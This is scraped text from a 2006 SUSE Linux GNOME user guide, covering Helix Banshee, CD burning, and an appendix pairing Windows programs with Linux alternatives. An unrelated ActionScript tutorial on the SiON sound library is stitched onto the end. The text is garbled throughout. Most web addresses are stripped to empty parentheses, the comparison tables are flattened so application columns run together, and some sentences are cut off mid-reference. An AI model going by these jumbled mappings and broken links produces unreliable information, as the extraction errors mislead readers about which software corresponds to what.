Use the iPod Properties dialog to rename and reclaim your iPod, and view vital statistics.
Figure 12-6 Helix Banshee iPod Properties
12.3 Creating Audio and MP3 CDs
To create audio and MP3 CDs, select the songs you want, then click the Write CD button in the upper right side of Helix Banshee.
12.4 Configuring Preferences
You can configure Helix Banshee preferences by clicking Edit > Preferences. The Preferences dialog contains the following tabs: Library Lets you specify a music folder location. This location is used when you import music. Click Copy files to Helix Banshee Music Folder when importing to Library to place a copy of the files you import in your Helix Banshee music folder. Encoding Lets you determine encoding profiles for CD ripping and iPod transcoding. Burning Lets you specify CD burning options. You can choose a disk drive, write speed, and disk format (Audio CD, MP3 CD, or Data CD). You can also configure advanced options, such as ejecting the CD when finished. Advanced Lets you choose from either the Helix Remote or the GStreamer engine for audio playback in Helix Banshee.
150 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
13
Burning CDs and DVDs
13
GNOME uses the Nautilus file manager to burn CDs and DVDs. To burn a CD or DVD: 1 Click Computer > More Applications > Audio & Video > GNOME CD/DVD Creator or insert a blank disc and click Create Data CD. 2 Copy the files you want to put on the CD into the Nautilus CD/DVD Creator window. 3 Click Write to Disc. 4,” on page 150.
Burning CDs and DVDs 151
novdocx (ENU) 01 February 2006
152 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
V
Appendixes
Appendixes 153
V
novdocx (ENU) 01 February 2006
154 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
A
Getting to Know Linux Software
A
Linux. TIP:.
A.1 Office
This section features the most popular and powerful Linux office and business software solutions. These include office suites, databases, accounting software, and project management software.
Table A-1 Office Software for Windows and Linux
Task
Windows Application
Linux Application
Office Suite
MS Office, StarOffice, OpenOffice.org
OpenOffice.org, StarOffice, KOffice OpenOffice.org/ StarOffice Writer, KWord
Word Processor MS Word, StarOffice/ OpenOffice.org Writer, WordPerfect Spreadsheet MS Excel, StarOffice/ OpenOffice.org Calc MS PowerPoint, StarOffice/ OpenOffice.org Impress
OpenOffice.org/ StarOffice Calc, Gnumeric, KSpread OpenOffice.org/ StarOffice Impress, KPresenter
Presentation
Data Plotting
MS Excel, OpenOffice.org MicroCall Origin Calc, Kst, Gnuplot, Grace (Xmgr), LabPlot
Getting to Know Linux Software 155
novdocx (ENU) 01 February 2006
Task
Windows Application
Linux Application
Local Database
MS Access, OpenOffice.org Base MS Money, Quicken, moneyplex MS Project MindManager, Free Mind
OpenOffice.org Base, Rekall, kexi, Mergeant, PostgreSQL GnuCash, moneyplex, KMyMoney Planner, Taskjuggler VYM (View Your Mind), Free Mind, KDissert
Financial Accounting Project Management Mind Mapping
FreeMind FreeMind helps you to visualize your thoughts by creating and editing a mind map. You can easily copy nodes or the style of nodes and paste texts from sources such as HTML, RTF, and mails. The mind maps can be exported into various formats, such as HTML and XML. For more information, refer to ( wiki/index.php/Main_Page). GnuCash GnuCash is a software tool to control both your personal and business finances. Keep track of income and expenses and manage your bank accounts and stock portfolios all using one piece of software. Learn more about GnuCash at (). Gnumeric Gnumeric is a spreadsheet solution for the GNOME desktop environment. Find more information about Gnumeric at (). Gnuplot Gnuplot is a very powerful and portable command line–controlled data plotting software. It is also available for MacOS and Windows platforms. Plots created by Gnuplot can be exported to various formats, such as PostScript, PDF, and SVG, allowing you to process these plots easily. Find more information about Gnuplot at ( index.html). Grace Grace is a very mature 2D plotting tool for almost all flavors of Unix including Linux. Create and edit plots with a graphical user interface. Grace supports an unlimited number of graphs per plot. Its export formats include JPEG, PNG, SVG, PDF, PS, and EPS. Find more information at plasma-gate.weizmann.ac.il/Grace/ (). Kdissert Kdissert is an application for structuring ideas and concepts, mostly aimed at students but also helpful for teachers, decision makers, engineers, and businessmen. Ideas are first laid down on a canvas then associated into a tree. You can generate various outputs from the mind map, such
156 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
as PDF files, text documents (also for OpenOffice.org Writer), and HTML files. Find more information at (). KMyMoney KMyMoney is a personal finance manager for KDE. It enables users of open source operating systems to keep track of their personal finances by providing a broad array of financial features and tools. Learn more about KMyMoney at kmymoney2.sourceforge.net (http:// kmymoney2.sourceforge.net). KOffice KOffice is an integrated office suite for the KDE desktop. It comes with various modules like word processing (KWord), spreadsheets (KSpread), presentations (KPresenter), several image processing applications (Kivio, Karbon14, Krita), a database front-end (Kexi), and many more. Find more information about KOffice at (). Kst Kst is a KDE application for real-time data viewing and plotting with basic data analysis functionality. Kst contains many powerful built-in features, such as robust plotting of live streaming data, and is expandable with plug-ins and extensions. Find more about Kst at kst.ked.org (). LabPlot LabPlot is a program for creating and managing two or three-dimensional data plots. Graphs can be produced both from data and functions and one plot might include multiple graphs. It also offers various data analysis methods. Find more information about LabPlot at labplot.sourceforge.net (). Mergeant Mergeant is a database front-end for the GNOME desktop. Find more information at (). moneyplex moneyplex is a tool to control your finances. All tasks from managing incoming resources and expenses and monitoring your stock portfolio to online transactions via the HBCI standard are handled by moneyplex. Keep track of your financial transactions over time using various analysis options. Because this tool is also available for Windows, users can migrate very easily without having to learn a whole new application interface. Find more information about moneyplex at (). OpenOffice.org OpenOffice.org is the open source equivalent of MS Office. It is a very powerful office suite including a word processor (Write), a spreadsheet (Calc), a database manager (Base), a presentation manager (Impress), a drawing program (Draw), and a formula editor for generating mathematical equations and formulas (Math). Users familiar with the MS Office family of applications find a very similar application interface and all the functionality to which they are accustomed. Because OpenOffice.org is capable of importing data from MS Office applications, the transition from one office suite to the other is very smooth. A Windows version of OpenOffice.org even exists, enabling Windows users to switch to an open source alternative while still using Windows. Find more information about OpenOffice.org at () and read our OpenOffice.org chapter for a short introduction to the office suite.
Getting to Know Linux Software 157
novdocx (ENU) 01 February 2006
Planner Planner is a project management tool for the GNOME desktop aiming to provide functionality similar to the project management tools used under Windows. Among its various features are Gantt charting abilities and different kinds of views of tasks and resources. Find more information about Planner at ( projects/planner/). PostgreSQL PostgreSQL is an object-relational database management system that supports an extended subset of the SQL standard, including transactions, foreign keys, subqueries, triggers, and userdefined types and functions. Find more information about PostgreSQL at (). Rekall Rekall is a tool for manipulating databases. Supported databases include MySQL, PostgreSQL, XBase with XBSQL, IBM DB2, and ODBC. Use Rekall to generate different sorts of reports and forms, design database queries, or import and export data to various formats. Find more information about Rekall at (http://). StarOffice StarOffice is a proprietary version of OpenOffice.org and is distributed by Sun Microsystems. It is available on multiple platforms including Windows and Solaris. It includes certain advanced features not available with the free version (OpenOffice.org). Find more information about StarOffice at ( staroffice/). Taskjuggler Taskjuggler is a lean, but very powerful project management software. Take control of your projects using the Gantt charting features or by generating all kinds of reports (in XML, HTML, or CSV format). Those users who are not comfortable with controlling applications from the command line can use a graphical front-end to Taskjuggler. Find more information about Taskjuggler at (). VYM (View Your Mind) VYM is a software for visualizing your thoughts by creating and manipulating mind maps. Most manipulations do not require more than one mouse click. Branches can be inserted, deleted, and reordered very easily. VYM also offers a set of flags allowing you to mark certain parts of the map (important, time critical, etc.). Links, notes, and images can be added to a mind map as well. VYM mind maps use an XML format, allowing you to export your mind maps to HTML easily. Find more information about VYM at (http://).
A.2 Network
The following section features various Linux applications for networking purposes. Get to know the most popular Linux browsers and e-mail and chat clients.
158 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Table A-2 Network Software for Windows and Linux
Task
Windows Application
Linux Application
Web Browser
Internet Explorer, Firefox, Opera MS Outlook, Lotus Notes, Mozilla Thunderbird MSN, AIM, Yahoo Messenger, XChat, Gaim NetMeeting
Konqueror, Firefox, Opera, Epiphany Evolution, Kontact, Mozilla Thunderbird Gaim, Kopete, Konversation, XChat GnomeMeeting/ Ekiga Linphone, Skype gftp, kbear
E-Mail Client/ Personal Information Management Instant Messaging/IRC Clients Conferencing (Video and Audio) Voice over IP FTP Clients
X-Lite leechftp, wsftp
Epiphany Epiphany is a lean, but powerful Web browser for the GNOME desktop. Many of its features and extensions resemble Firefox. Find more information about Epiphany at projects/epiphany (). Evolution Evolution is personal information management software for the GNOME desktop combining mail, calendar, and address book functionality. It offers advanced e-mail filter and search options, provides sync functionality for Palm devices, and allows you to run Evolution as an Exchange or GroupWise client to integrate better into heterogeneous environments. Find more information about Evolution at ( projects/evolution/). Firefox Firefox is the youngest member of the Mozilla browser family. It runs on various platforms, including Linux, MacOS, and Windows. Its main features include built-in customizable searches, pop-up blocking, RSS news feeds, password management, tabbed browsing, and some advanced security and privacy options. Firefox is very flexible, allowing you to customize almost anything you want (searches, toolbars, skins, buttons, etc.). Neat add-ons and extensions can be downloaded from the Firefox Web site ( ?application=firefox)). Find more information about Firefox at firefox (). You can also read our Firefox chapter. Gaim Gaim is a smart instant messenger program supporting multiple protocols, such as AIM and ICQ (Oscar protocol), MSN Messenger, Yahoo!, IRC, Jabber, SILC, and GroupWise Messenger. It is possible to log in to different accounts on different IM networks and chat on
Getting to Know Linux Software 159
novdocx (ENU) 01 February 2006
different channels simultaneously. Gaim also exists in a Windows version. Find more information about Gaim at gaim.sourceforge.net (). gftp gftp is an FTP client using the GTK toolkit. Its features include simultaneous downloads, resume of interrupted file transfers, file transfer queues, download of entire directories, FTP proxy support, remote directory caching, passive and nonpassive file transfers, and drag and drop support. Find more information at g (). GnomeMeeting/Ekiga GnomeMeeting (recently renamed Ekiga) is the open source equivalent of Microsoft's NetMeeting. It features LDAP and ILS support for address lookup and integrates with Evolution to share the address data stored there. GnomeMeeting/Ekiga supports PC-to-phone calls, allowing you to call another party with just your computer, sound card, and microphone without any additional hardware. Find more information about GnomeMeeting/Ekiga at (). kbear KBear is a KDE FTP client with the ability to have concurrent connections to multiple hosts, three separate view modes, support for multiple protocols (like FTP and SFTP), a site manager plug-in, firewall support, logging capabilities, and much more. Find more information at sourceforge.net/projects/kbear (). Konqueror Konqueror is a multitalented application created by the KDE developers. It acts as file manager and document viewer, but is also a very powerful and highly customizable Web browser. It supports the current Web standards, such as CSS(2), Java applets, JavaScript and Netscape plug-ins (Flash and RealVideo), DOM, and SSL. It offers neat helpers like an integrated search bar and supports tabbed browsing. Bookmarks can be imported from various other Web browsers, like Internet Explorer, Mozilla, and Opera. Find more information about Konqueror at (). You can also read our chapter about Konqueror as a Web browser in KDE User Guide. Kontact Kontact is the KDE personal information management suite. It includes e-mail, calendar, address book, and Palm sync functionalities. Like Evolution, it can act as an Exchange or GroupWise client. Kontact combines several stand-alone KDE applications (KMail, KAddressbook, KOrganizer, and KPilot) to form an entity providing all the PIM functionality you need. Find more information about Kontact at (). You can also read our Kontact chapter in KDE User Guide. Konversation Konversation is an easy-to-use IRC client for KDE. Its features include support for SSL connections, strikeout, multichannel joins, away and unaway messages, ignore list functionality, Unicode, autoconnect to a server, optional time stamps in chat windows, and configurable background colors. Find more information about Konversation at konversation.kde.org (). Kopete Kopete is a very intuitive and easy-to-use instant messenger tool supporting protocols including IRC, ICQ, AIM, GroupWise Messenger, Yahoo, MSN, Gadu-Gadu, Lotus
160 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Sametime, SMS messages, and Jabber. Find more information about Kopete at kopete.kde.org (). Linphone Linphone is a smart and lean Voice over IP client using the SIP protocol to establish calls. Find more information at (). You can also read our Linphone chapter. Mozilla Thunderbird Thunderbird is an e-mail client application that comes as part of the Mozilla suite. It is also available for Microsoft Windows and MacOS, which facilitates the transition from one of these operating systems to Linux. Find more information about Mozilla Thunderbird at (). Opera Opera is a powerful Web browser with neat add-ons like an optional e-mail client and a chat module. Opera offers pop-up blocking, RSS feeds, built-in and customizable searches, a password manager, and tabbed browsing. The main functionalities are easily reached through their respective panels. Because this tool is also available for Windows, it allows a much easier transition to Linux for those who have been using it under Windows. Find more information about Opera at (). Skype Skype is an application for several platforms (Linux, Windows, Mac Os X) that can be used for phone calls over the Internet with a good sound quality and with end-to-end encryption. When using Skype, configuring the firewall or router is not necessary. For more information, refer to (). XChat XChat is an IRC client that runs on most Linux and UNIX platforms as well as under Windows and MacOS X. Find more information about XChat at ().
A.3 Multimedia
The following section introduces the most popular multimedia applications for Linux. Get to know media players, sound editing solutions, and video editing tools.
Table A-3 Multimedia Software for Windows and Linux
Task
Windows Application
Linux Application
Audio CD Player CD Player, KsCD, Grip, Winamp, Helix Banshee Windows Media Player CD Burner Nero, Roxio Easy CD Creator K3b
Getting to Know Linux Software 161
novdocx (ENU) 01 February 2006
Task
Windows Application
Linux Application
CD Ripper
WMPlayer
kaudiocreator, Sound Juicer, Helix Banshee
Audio Player
Winamp, amaroK, XMMS, Windows Media Rhythmbox, Player, iTunes Helix Banshee Winamp, Kaffeine, Windows Media MPlayer, Xine, Player XMMS, Totem, RealPlayer SoundForge, Cooledit, Audacity sndvol32 Finale, SmartScore, Sibelius Audacity
Video Player
Audio Editor
Sound Mixer Music Notation
alsamixer, Kmix LilyPond, MusE, Noteedit, Rosegarden
Video Creator and Editor
Windows Movie MainActor, Kino Maker, Adobe Premiere, Media Studio Pro, MainActor AVerTV, xawtv (analog), PowerVCR 3.0, motv (analog), CinePlayer DVR xawtv4, tvtime, kdetv, zapping, Kaffeine
TV Viewer
amaroK The amaroK media player handles various audio formats and plays the streaming audio broadcasts of radio stations on the Internet. The program handles all file types supported by the sound server acting as a back-end—currently aRts or GStreamer. Find more information about amaroK at amarok.kde.org (). Audacity Audacity is a powerful, free sound editing tool. Record, edit, and play any Ogg Vorbis or WAV file. Mix tracks, apply effects to them, and export the results to WAV or Ogg Vorbis. Find more information about Audacity at audacity.sourceforge.net (). Grip Grip provides CD player functionalities for the GNOME desktop. It supports CDDB lookups for track and album data. Find more information at (http://). Helix Banshee Helix Banshee is a music management and playback application for the GNOME desktop. With Helix Banshee, import CDs, sync your music collection to an iPod, play music directly
162 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
from an iPod, create playlists with songs from your library, and create audio and MP3 CDs from subsets of your library. For more information, refer to GNOME User Guide. Kaffeine Kaffeine is a versatile multimedia application supporting a wide range of audio and video formats including Ogg Vorbis, WMV, MOV, and AVI. Import and edit play lists of various types, create screen shots, and save media streams to your local hard disk. Find more information about Kaffeine at kaffeine.sourceforge.net (). KAudiocreator KAudioCreator is a lean CD ripper application. If configured accordingly, KAudioCreator also generates playlist files for your selection that can be used by players like amaroK, XMMS, or Helix Banshee. Read more about using KAudioCreator in KDE User Guide or go to ( ?program=KAudioCreator). kdetv A TV viewer and recorder application for the KDE desktop supporting analog TV. Find more information about kdetv at (). KsCD KsCD is a neat little CD player application for the KDE desktop. Its user interface very much resembles that of a normal hardware CD player, guaranteeing ease of use. KsCD supports CDDB, enabling you to get any track and album information from the Internet or your local file system. Find more information at docs.kde.org/en/3.3/kdemultimedia/kscd (http:// docs.kde.org/en/3.3/kdemultimedia/kscd/). K3b K3b is a multitalented media creation tool. Create data, audio, or video CD and DVD projects by dragging and dropping. Find more information about K3b at (http://). You can also refer to our K3b chapter. LilyPond LilyPond is a free music sheet editor. Because the input format is text-based, you can use any text editor to create note sheets. Users do not need to tackle any formatting or notation issues, like spacing, line-breaking, or polyphonic collisions. All these issues are automatically resolved by LilyPond. It supports many special notations like chord names and tablatures. The output can be exported to PNG, TeX, PDF, PostScript, and MIDI. Find more information about LilyPond at lilpond.org (). MainActor MainActor is a fully fledged video authoring software. Because there is a Windows version of MainActor, transition from Windows is easy. Find more information about MainActor at (). MPlayer MPlayer is a movie player that runs on several systems. Find more information about MPlayer at (). MusE
Getting to Know Linux Software 163
novdocx (ENU) 01 February 2006
MusE's goal is to be a complete multitrack virtual studio for Linux. Find more information about MusE at (). Noteedit Noteedit is a powerful score editor for Linux. Use it to create sheets of notes and to export and import scores to and from many formats, such as MIDI, MusicXML and LilyPond. Find more information about Noteedit at developer.berlios.de/projects/noteedit (http:// developer.berlios.de/projects/noteedit/). Rhythmbox Rhythmbox is a powerful, multitalented media player for the GNOME desktop. It allows you to organize and browse your music collection using playlists and even supports Internet radio. Find more information about Rhythmbox at (http://). Rosegarden Rosegarden is a free music composition and editing environment. It features an audio and MIDI sequencer and a score editor. Find more information about Rosegarden at rosegardenmusic.com (). Sound Juicer Sound Juicer is a lean CD ripper application for the GNOME desktop. Find more information about Sound Juicer at (http://). Totem Totem is a movie player application for the GNOME desktop. It supports Shoutcast, m3u, asx, SMIL, and ra playlists, lets you use keyboard controls, and plays a wide range of audio and video formats. Find more information about Totem at (http://). tvtime tvtime is a lean TV viewer application supporting analog TV. Find more information about tvtime, including a comprehensive usage guide, at tvtime.sourceforge.net (http:// tvtime.sourceforge.net/). xawtv and motv xawtv is a TV viewer and recorder application supporting analog TV. motv is basically the same as xawtv, but with a slightly different user interface. Find more information about the xawtv project at linux.bytesex.org/xawtv (). xawtv4 xawtv4 is a successor of the xawtv application. It supports both analog and digital audio and video broadcasts. For more information, refer to linux.bytesex.org/xawtv (http:// linux.bytesex.org/xawtv/). Xine Xine is a multimedia player that plays CDs, DVDs, and VCDs. It interprets many multimedia formats. For more information, refer to xinehq.de (). XMMS
164 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
XMMS is the traditional choice for multimedia playback. It is focused on music playback, offering support for CD playback and Ogg Vorbis files. Users of Winamp should find XMMS comfortable because of its similarity. Find more information about XMMS at (). zapping A TV viewer and recorder application for the GNOME desktop supporting analog TV. Find more information about Zapping at zapping.sourceforge.net ( cgi-bin/view/Main/WebHome).
A.4 Graphics
The following section presents some of the Linux software solutions for graphics work. These include simple drawing applications as well as fully-fledged image editing tools and powerful rendering and animation programs.
Table A-4 Graphics Software for Windows and Linux
Task
Windows Application
Linux Application
Simple Graphic Editing Professional Graphic Editing
MS Paint
KolourPaint
Adobe The GIMP, Krita Photoshop, Paint Shop Pro, Corel PhotoPaint, The GIMP Adobe OpenOffice.org Illustrator, Draw, Inkscape, CorelDraw, Dia OpenOffice.org Draw, Freehand WebDraw, Inkscape, Dia, Freehand, Kivio Adobe Illustrator 3D Studio MAX, POV-Ray, Blender, Maya, POVRay, Blender KPovmodeler Software provided by the camera manufacturer Vuescan ACDSee Digikam, f-spot
Creating Vector Graphics
SVG Editing
Creating 3D Graphics Managing Digital Photographs Scanning Image Viewing
Vuescan, The GIMP gwenview, gThumb, Eye of Gnome, f-spot
Getting to Know Linux Software 165
novdocx (ENU) 01 February 2006
Blender Blender is a powerful rendering and animation tool available on many platforms, including Windows, MacOS, and Linux. Find more information about Blender at (). Dia Dia is a Linux application aiming to be the Linux equivalent of Visio. It supports many types of special diagrams, such as network or UML charts. Export formats include SVG, PNG, and EPS. To support your own custom diagram types, provide the new shapes in a special XML format. Find more information about Dia at (http://). Digikam Digikam is a smart digital photo management tool for the KDE desktop. Importing and organizing your digital images is a matter of a few clicks. Create albums, add tags to spare you from copying images around different subdirectories, and eventually export your images to your own Web site. Find more information about Digikam at (http://). You can also refer to our Digikam chapter in KDE User Guide. Eye of Gnome (eog) Eye of Gnome is an image viewer application for the GNOME desktop. Find more information at (). f-spot f-spot is a flexible digital photograph management tool for the GNOME desktop. It lets you create and manage albums and supports various export options like HTML pages or burning of image archives to CD. You can also use it as an image viewer on the command line. Find more information about f-spot at (). You can also refer to our chapter in GNOME User Guide. gThumb gThumb is an image viewer, browser, and organizer for the GNOME desktop. It supports the import of your digital images via gphoto2, allows you to carry out basic transformation and modifications, and lets you tag your images to create albums matching certain categories. Find more information about gThumb at gthumb.sourceforge.net (). Gwenview Gwenview is a simple image viewer for KDE. It features a folder tree window and a file list window that provides easy navigation of your file hierarchy. Find more information at gwenview.sourceforge.net (). Inkscape Inkscape is a free SVG editor. Users of Adobe Illustrator, Corel Draw, and Visio can find a similar range of features and a familiar user interface in Inkscape. Among its features, find SVG-to-PNG export, layering, transforms, gradients, and grouping of objects. Find more information about Inkscape at (). Kivio Kivio is a flow-charting application that integrates into the KOffice suite. Former users of Visio find a familiar look and feel in Kivio. Find more information about Kivio at kivio ().
166 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
KolourPaint KolourPaint is an easy-to-use paint program for the KDE desktop. You can use it for tasks such as painting or drawing diagrams and editing screen shots, photos, and icons. For more information, refer to kolourpaint.sourceforge.net (). KPovmodeler KPovmodeler is a POV-Ray front-end that integrates with the KDE desktop. KPovmodeler saves users from needing a detailed knowledge of POV-Ray scripting by translating the POVRay language in an easy-to-understand tree view. Native POV-Ray scripts can be imported to KPovmodeler as well. Find more information at (http://). Krita Krita is KOffice's answer to Adobe Photoshop and The GIMP. It can be used for pixel-based image creation and editing. Its features include many of the advanced image editing capabilities you would normally expect with Adobe Photoshop or The GIMP. Find more information at (). OpenOffice.org Draw See “OpenOffice.org” on page 157. POV-Ray The Persistence of Vision Raytracer creates three-dimensional, photo-realistic images using a rendering technique called ray tracing. Because there is a Windows version of POV-Ray, it does not take much for Windows users to switch to the Linux version of this application. Find more information about POV-Ray at (). The GIMP The GIMP is the open source alternative to Adobe Photoshop. Its feature list rivals that of Photoshop, so it is well suited for professional image manipulation. There is even a Windows version of GIMP available. Find more information at (). You can also refer to our GIMP chapter. VueScan VueScan is a scanning software available for several platforms. You can install it parallel to your vendor's scanner software. It supports the scanner's special hardware, like batch scanning, autofocus, infrared channels for dust and scratch suppression, and multiscan to reduce scanner noise in the dark areas of slides. It features simple and accurate color correction from color negatives. Find out more at ().
A.5 System and File Management
The following section provides an overview of Linux tools for system and file management. Get to know text and source code editors, backup solutions, and archiving tools.
Getting to Know Linux Software 167
novdocx (ENU) 01 February 2006
Table A-5 System and File Management Software for Windows and Linux
Task
Windows Application
Linux Application
File Manager Text Editor
Windows Explorer NotePad, WordPad, (X)Emacs Adobe Distiller Adobe Reader
Konqueror, Nautilus kate, GEdit, (X)Emacs, vim Scribus Adobe Reader, Evince, KPDF, Xpdf GOCR zip, tar, gzip, bzip2, etc. Ark, File Roller YaST, GNU Parted
PDF Creator PDF Viewer
Text Recognition Command Line Pack Programs
Recognita, FineReader zip, rar, arj, lha, etc.
GUI Based Pack WinZip Programs Hard Disk Partitioner PowerQuest, Acronis, Partition Commander ntbackup, Veritas
Backup Software
KDar, taper, dump
Adobe Reader Adobe Reader for Linux is the exact counterpart of the Windows and Mac versions of this application. The look and feel on Linux are the same as on other platforms. The other parts of the Adobe Acrobat suite have not been ported to Linux. Find more information at (). Ark Ark is a GUI-based pack program for the KDE desktop. It supports common formats, such as zip, tar.gz, tar.bz2, lha, and rar. You can view, select, pack, and unpack single files within an archive. Due to Ark's integration with Konqueror, you can also trigger actions (such as unpacking an archive) from the context menu in the file manager, similar to WinZip. dump The dump package contains both dump and restore. dump examines files in a file system, determines which ones need to be backed up, and copies those files to a specified disk, tape, or other storage medium. The restore command performs the inverse function of dump—it can restore a full backup of a file system. Find more information at dump.sourceforge.net (http:// dump.sourceforge.net/). Evince
168 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Evince is a document viewer for PDF and PostScript formats for the GNOME desktop. Find more information at ( ). File Roller File Roller is a GUI-based pack program for the GNOME desktop. It provides features similar to Ark's. For more information, refer to fileroller.sourceforge.net (http:// fileroller.sourceforge.net/home.html). GEdit GEdit is the official text editor of the GNOME desktop. It provides features similar to Kate's. Find more information at ( gedit/). GNU Parted GNU Parted is a command line tool for creating, destroying, resizing, checking, and copying partitions and the file systems on them. If you need to create space for new operating systems, use this tool to reorganize disk usage and copy data between different hard disks. Find more information at (). GOCR GOCR is an OCR (optical character recognition) tool. It converts scanned images of text into text files. Find more information at jocr.sourceforge.net (). gzip, tar, bzip2 There are plenty of packaging programs for reducing disk usage. In general, they differ only in their pack algorithm. Linux can also handle the packaging formats used on Windows. bzip2 is a bit more efficient than gzip, but needs more time, depending on the pack algorithm. kate Kate is part of the KDE suite. It has the ability to open several files at once either locally or remotely. With syntax highlighting, project file creation, and external scripts execution, it is a perfect tool for a programmer. Find more information at kate.kde.org (). KDar KDar stands for KDE disk archiver and is a hardware-independent backup solution. KDar uses catalogs (unlike tar), so it is possible to extract a single file without reading the whole archive and it is also possible to create incremental backups. KDar can split an archive into multiple slices and trigger the burning of a data CD or DVD for each slice. Find more information about KDar at kdar.sourceforge.net (). Konqueror Konqueror is the default file manager for the KDE desktop, which can also be used as a Web browser, document and image viewer, and CD ripper. Find more information about this multifunctional application at (). KPDF KPDF is a PDF viewing application for the KDE desktop. Its features include searching the PDF and full screen reading mode like in Adobe Reader. Find more information at kpdf.kde.org ().
Getting to Know Linux Software 169
novdocx (ENU) 01 February 2006
Nautilus Nautilus is the default file manager of the GNOME desktop. It can be used to create folders and documents, display and manage your files and folders, run scripts, write data to a CD, and open URI locations. For an introduction to using Nautilus as a file manager, see GNOME User Guide. Find information about Nautilus on the Internet at (). taper Taper is a backup and restore program that provides a friendly user interface to allow backup and restoration of files to and from a tape drive. Alternatively, files can be backed up to archive files. Recursively selected directories are supported. Find more information at taper.sourceforge.net (). vim vim (vi improved) is a program similar to the text editor vi. Users may need time to adjust to vim, because it distinguishes between command mode and insert mode. The basic features are the same as in all text editors. vim offers some unique options, like macro recording, file format detection and conversion, and multiple buffers in a screen. Find more information at (). (X)Emacs GNU Emacs and XEmacs are very professional editors. XEmacs is based on GNU Emacs. To quote the GNU Emacs Manual, “Emacs is the extensible, customizable, self-documenting realtime display editor.” Both offer nearly the same functionality with minor differences. Used by experienced developers, they are highly extensible through the Emacs Lisp language. They support many languages, like Russian, Greek, Japanese, Chinese, and Korean. Find more information at () and (). Xpdf Xpdf is lean PDF viewing suite for Linux and Unix platforms. It includes a viewer application and some export plug-ins for PostScript or text formats. Find more information at ().
A.6 Software Development
This section introduces Linux IDEs, toolkits, development tools, and versioning systems for professional software development.
Table A-6 Development Software for Windows and Linux
Task
Windows Application
Linux Application
Integrated Development Environments Toolkits Compilers
Borland C++, Delphi, Visual Studio, .NET MFC, Qt, GTK+ VisualStudio
KDevelop, Eric, Eclipse, MonoDevelop, Anjuta Qt, GTK+ GCC
170 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Task
Windows Application
Linux Application
Debugging Tools GUI Design Versioning Systems
Visual Studio Visual Basic, Visual C++ Clearcase, Perforce, SourceSafe
GDB, valgrind Glade, Qt Designer CVS, Subversion
Anjuta Anjuta is an IDE for GNOME/GTK+ application development. It includes an editor with automated formatting, code completion, and highlighting. As well as GTK+, it supports Perl, Pascal, and Java development. A GDB-based debugger is also included. Find more information about Anjuta at anjuta.sourceforge.net (). CVS CVS, the Concurrent Versions System, is one of the most important version control systems for open source. It is a front-end to the Revision Control System (RCS) included in the standard Linux distributions. Find more information at the home page (http://). Eclipse The Eclipse Platform is designed for building integrated development environments that can be extended with custom plug-ins. The base distribution also contains a full-featured Java development environment. Find more information at (http://). Eric Eric is an IDE optimized for Python and Python-Qt development. Find more information about Eric at ( eric3.html). GCC GCC is a compiler collection with front-ends for various programming languages. Check out a complete list of features and find extensive documentation at gcc.gnu.org (). GDB GDB is a debugging tool for programs written in various programming languages. Find more information about GDB at ( gdb.html). Glade Glade is a user interface builder for GTK+ and GNOME development. As well as GTK+ support, it offers support for C, C++, C#, Perl, Python, Java, and others. Find more information about Glade at glade.gnome.org (). GTK+
Getting to Know Linux Software 171
novdocx (ENU) 01 February 2006
GTK+ is a multiplatform toolkit for creating graphical user interfaces. It is used for all GNOME applications, The GIMP, and several others. GTK+ has been designed to support a range of languages, not only C/C++. Originally it was written for GIMP, hence the name “GIMP Toolkit.” Find more information at (). Language bindings for GTK+ are summarized under ( bindings.html). KDevelop KDevelop allows you to write programs for different languages (C/C++, Python, Perl, etc.). It includes a documentation browser, a source code editor with syntax highlighting, a GUI for the compiler, and much more. Find more information at (http://). MonoDevelop The Mono Project is an open development initiative that is working to develop an open source Unix version of the .NET development platform. Its objective is to enable Unix developers to build and deploy cross-platform .NET applications. MonoDevelop complements the Mono development with an IDE. Find more information about MonoDevelop at (). Qt Qt is a program library for developing applications with graphical user interfaces. It allows you to develop professional programs rapidly. The Qt library is available not only for Linux, but for a number of Unix flavors and even for Windows and Macintosh. Thus it is possible to write programs that can be easily ported to those platforms. Find more information at (). Language bindings for Qt development are summarized under developer.kde.org/language-bindings (). Qt Designer Qt Designer is a user interface and form builder for Qt and KDE development. It can be run as part of the KDevelop IDE or in stand-alone mode. QtDesigner can be run under Windows and even integrates into the Visual Studio development suite. Find more information about Qt Designer at ( qt/designer.html). Subversion Subversion does the same thing CVS does but has major enhancements, like moving, renaming, and attaching meta information to files and directories. The Subversion home page is subversion.tigris.org (). Valgrind Valgrind is a suite of programs for debugging and profiling x86 applications. Find more information about Valgrind at valgrind.org ().
172 SUSE Linux Enterprise Desktop 10 GNOME User Guide | https://www.scribd.com/document/2937301/SUSE-Linux-Enterprise-Desktop-10-Gnome-User-Guide | CC-MAIN-2018-05 | refinedweb | 46,701 | 65.12 |
In this tutorial I'll be showing you how to get started with SiON, an AS3 software synthesizer library which generates sound using only code.
Final Result Preview
In the end this is what we're going to obtain:
Click on the darker rectangle area to start/stop the balls movement.
Getting Necessary Files
First you need to get the SiON library. You can download it either as a SWC file or as uncompressed ActionScript files. To do this go to SiON Downloads and select the desired download method.
After you've downloaded the source code add it to your global class path.
Notice that on this page you can also download the ASDoc documentation and older versions of the library.
In this tutorial we'll make use of the well known minimalcomps library, developed by Keith Peters; if you don't have it go ahead and grab it: minimalcomps.
Also add the minimalcomps library to your global class path and let's get started.
Note: As always I'll be using FlashDevelop throughout this tutorial. You can use whatever code editor you like although I recommend sticking with FlashDevelop.
Step 1: What is SiON?
The SiON library is a software synthesizer library built in ActionScript 3.0 and works in Flash Player 10 or higher.
